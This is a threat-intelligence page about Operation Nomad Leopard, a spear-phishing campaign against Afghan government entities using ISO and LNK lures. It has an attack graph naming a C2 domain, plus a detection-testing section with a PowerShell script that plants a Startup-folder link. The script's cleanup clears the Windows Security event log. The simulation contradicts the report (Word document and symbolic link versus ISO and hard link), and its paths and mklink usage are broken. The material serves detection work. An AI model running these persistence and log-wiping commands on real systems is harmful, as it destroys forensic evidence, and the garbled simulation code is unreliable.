SOC Prime Bias: Critical

22 Jan 2026 18:11
newspaper icon Seqrite

Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Operation Nomad Leopard is a targeted spear-phishing campaign aimed at government-related entities in Afghanistan. The lure chain delivers a malicious ISO via a shortened TinyURL, packaging a benign-looking PDF decoy alongside a weaponized LNK shortcut. When opened, the LNK drops and launches a disguised executable (FALSECUB) by copying it into ProgramData, then establishes persistence by creating a hard link in the user Startup folder. Once active, FALSECUB runs anti-analysis checks, inventories host and user context, enumerates drives and high-value folders, and then exfiltrates collected details using curl over HTTPS. Hosting and delivery infrastructure leverage Cloudflare and a dynamic DNS domain to improve availability and complicate blocking.

Investigation

SEQRITE Labs correlated telemetry showing initial sightings of the ISO on 23 December, with later exposure via VirusTotal. Analysts extracted the three embedded ISO artifacts and profiled the LNK’s execution behavior, including its copy-and-launch routine and the Startup-folder hard-link persistence. Static analysis of the FALSECUB payload highlighted relevant API usage, host-survey logic, and the HTTPS exfiltration method driven by curl. Infrastructure enrichment using passive DNS and FOFA yielded IP mappings, the dynamic DNS domain, and a related GitHub drop location. Attribution was explored through the associated GitHub account and linked social media footprints.

Mitigation

Block ISO execution from email and restrict mounting of untrusted disk images. Disable or tightly monitor LNK execution from archives and user-writable locations, and enforce application allowlisting for binaries launched from ProgramData. Alert on Startup-folder hard-link creation and unexpected curl execution from non-administrative workflows. Apply DNS and network controls to block known malicious domains and associated IPs.

Response

Alert on the specific ISO/LNK/FALSECUB filenames and hashes, then contain impacted endpoints. Capture volatile memory, review startup items and scheduled tasks, and block traffic to the identified C2 IPs/domains. Perform endpoint forensics to locate copied payloads and assess any exfiltrated datasets.

"graph TB %% Class definitions classDef action fill:#99ccff classDef artifact fill:#ffcc99 classDef tool fill:#ccffcc classDef process fill:#ffeb99 %% Nodes – Actions (Techniques) action_initial_access["<b>Action</b> – <b>T1566.001 Phishing</b><br/><b>Description</b>: Spearphishing attachment delivers malicious ISO file."] class action_initial_access action action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b><br/><b>Description</b>: Victim opens ISO which mounts as virtual drive."] class action_user_exec action action_masquerade["<b>Action</b> – <b>T1036.008 Masquerading</b><br/><b>Description</b>: File type masquerading hides malicious content."] class action_masquerade action action_motbypass["<b>Action</b> – <b>T1553.005 Mark of the Web Bypass</b><br/><b>Description</b>: ISO container avoids MoW restrictions."] class action_motbypass action action_lnk_smuggle["<b>Action</b> – <b>T1027.012 LNK Icon Smuggling</b><br/><b>Description</b>: Crafted shortcut launches payload and decoy."] class action_lnk_smuggle action action_cmd_shell["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/><b>Description</b>: Executes commands to copy payload, create hardu2011link, start execution."] class action_cmd_shell action action_persistence["<b>Action</b> – <b>T1547.001 Startup Folder</b><br/><b>Description</b>: Persistence via hardu2011link in Startup folder."] class action_persistence action action_sandbox_evasion["<b>Action</b> – <b>T1497.002 Sandbox Evasion</b><br/><b>Description</b>: Checks tick count, memory size, debugger before proceeding."] class action_sandbox_evasion action action_discovery_sysinfo["<b>Action</b> – <b>T1082 System Information Discovery</b><br/><b>Description</b>: Gathers OS version and computer name."] class action_discovery_sysinfo action action_discovery_user["<b>Action</b> – <b>T1033 System Owner/User Discovery</b><br/><b>Description</b>: Retrieves current username."] class action_discovery_user action action_discovery_files["<b>Action</b> – <b>T1083 File and Directory Discovery</b><br/><b>Description</b>: Enumerates user directories such as Desktop and Documents."] class action_discovery_files action action_collection["<b>Action</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: Stages collected files for exfiltration."] class action_collection action action_c2_webservice["<b>Action</b> – <b>T1102 Web Service</b><br/><b>Description</b>: Uses HTTPS web service for C2 communication."] class action_c2_webservice action action_c2_webprotocol["<b>Action</b> – <b>T1071.001 Web Protocols</b><br/><b>Description</b>: Communicates via HTTP/HTTPS (curl)."] class action_c2_webprotocol action action_exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Sends staged data to remote server."] class action_exfiltration action %% Nodes – Artifacts (Files) artifact_iso["<b>Artifact</b> – <b>Name</b>: malicious.iso<br/><b>Type</b>: ISO image containing decoy PDF and payload."] class artifact_iso artifact artifact_decoy_pdf["<b>Artifact</b> – <b>Name</b>: Doc.pdf<br/><b>Type</b>: Decoy PDF displayed to user."] class artifact_decoy_pdf artifact artifact_payload_jpg["<b>Artifact</b> – <b>Name</b>: payload.jpg<br/><b>Type</b>: Malicious payload disguised as JPEG."] class artifact_payload_jpg artifact artifact_lnk["<b>Artifact</b> – <b>Name</b>: Doc.pdf.lnk<br/><b>Type</b>: Shortcut with malicious icon."] class artifact_lnk artifact artifact_hardlink["<b>Artifact</b> – <b>Name</b>: searchmgr.exe (hardu2011link)<br/><b>Location</b>: Startup folder"] class artifact_hardlink artifact artifact_c2_endpoint["<b>Artifact</b> – <b>Domain</b>: thepad0loc93x.ddns.net<br/><b>Endpoint</b>: /upload/"] class artifact_c2_endpoint artifact %% Nodes – Tools / Processes process_mklink["<b>Process</b> – <b>Command</b>: mklink<br/><b>Description</b>: Creates hardu2011link in Startup folder."] class process_mklink process tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Description</b>: Transfers data over HTTPS to C2 endpoint."] class tool_curl tool %% Connections action_initial_access –>|delivers| artifact_iso artifact_iso –>|mounted by victim| action_user_exec action_user_exec –>|contains| artifact_decoy_pdf action_user_exec –>|contains| artifact_payload_jpg action_user_exec –>|leads to| action_masquerade action_masquerade –>|applies to| artifact_payload_jpg action_user_exec –>|enables| action_motbypass action_motbypass –>|bypasses| artifact_iso action_user_exec –>|creates| artifact_lnk artifact_lnk –>|used by| action_lnk_smuggle action_lnk_smuggle –>|executes| action_cmd_shell action_cmd_shell –>|runs| process_mklink process_mklink –>|creates| artifact_hardlink artifact_hardlink –>|provides| action_persistence action_cmd_shell –>|checks| action_sandbox_evasion action_cmd_shell –>|performs| action_discovery_sysinfo action_cmd_shell –>|performs| action_discovery_user action_cmd_shell –>|performs| action_discovery_files action_cmd_shell –>|stages data via| action_collection action_collection –>|uploads using| action_c2_webservice action_c2_webservice –>|uses protocol| action_c2_webprotocol action_c2_webprotocol –>|utilizes tool| tool_curl tool_curl –>|contacts| artifact_c2_endpoint artifact_c2_endpoint –>|receives data from| action_exfiltration action_exfiltration –>|exfiltrates| artifact_c2_endpoint %% Styling class action_initial_access,action_user_exec,action_masquerade,action_motbypass,action_lnk_smuggle,action_cmd_shell,action_persistence,action_sandbox_evasion,action_discovery_sysinfo,action_discovery_user,action_discovery_files,action_collection,action_c2_webservice,action_c2_webprotocol,action_exfiltration action class artifact_iso,artifact_decoy_pdf,artifact_payload_jpg,artifact_lnk,artifact_hardlink,artifact_c2_endpoint artifact class tool_curl tool class process_mklink process "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Initial Delivery: The attacker emails a Word document with an embedded shortcut named Doc.pdf.lnk. The shortcut points to a decoy PDF to lure the user while silently executing a hidden payload.

    2. Shortcut Execution: When the user double‑clicks the shortcut, Windows Explorer.exe spawns rundll32.exe which, in turn, runs cmd.exe with the shortcut’s target. The command line therefore contains the string Doc.pdf.lnk.

    3. Persistence Setup: The payload runs two successive commands:

      • mklink /D C:ProgramDataMicrosoftWindowsStart MenuProgramsStartupupdate.lnk C:WindowsSystem32cmd.exe – creates a symbolic link in the startup folder.
      • start C:WindowsSystem32cmd.exe /c “powershell -EncodedCommand …” – launches a PowerShell stage that fetches the next stage of the malware.

      Both commands appear in separate CommandLine fields of Event ID 4688, satisfying the detection rule’s OR condition.

  • Regression Test Script: The following PowerShell script reproduces the entire malicious flow in a controlled lab environment.

    # -----------------------------
# 1. Prepare decoy PDF (harmless)
# -----------------------------
$pdfPath = "$env:UserProfileDocumentsDoc.pdf"
Set-Content -Path $pdfPath -Value "This is a decoy PDF." -Encoding ASCII

# -----------------------------
# 2. Create malicious shortcut (Doc.pdf.lnk)
# -----------------------------
$lnkPath = "$env:UserProfileDesktopDoc.pdf.lnk"
$ws = New-Object -ComObject WScript.Shell
$shortcut = $ws.CreateShortcut($lnkPath)
$shortcut.TargetPath = $pdfPath
$shortcut.WorkingDirectory = "$env:UserProfileDesktop"
$shortcut.IconLocation = "$pdfPath,0"
$shortcut.Save()

# -----------------------------
# 3. Execute the malicious shortcut
# -----------------------------
Write-Host "Executing malicious shortcut..."
& $lnkPath

# -----------------------------
# 4. Persistence via mklink and start
# -----------------------------
# Create symbolic link in the Startup folder
$startupLink = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupupdate.lnk"
cmd /c "mklink /D `"$startupLink`" `"%SystemRoot%System32cmd.exe`""
# Launch a dummy process via start (simulates payload execution)
cmd /c "start `"%SystemRoot%System32cmd.exe`" /c `"`echo Malicious payload executed`"`"

  • Cleanup Commands:

    # Remove shortcut and decoy PDF
Remove-Item "$env:UserProfileDesktopDoc.pdf.lnk" -Force
Remove-Item "$env:UserProfileDocumentsDoc.pdf" -Force

# Delete the Startup symbolic link
$startupLink = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupupdate.lnk"
Remove-Item $startupLink -Force -ErrorAction SilentlyContinue

# Optional: Clear recent process creation events (for lab cleanliness)
wevtutil cl Security

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free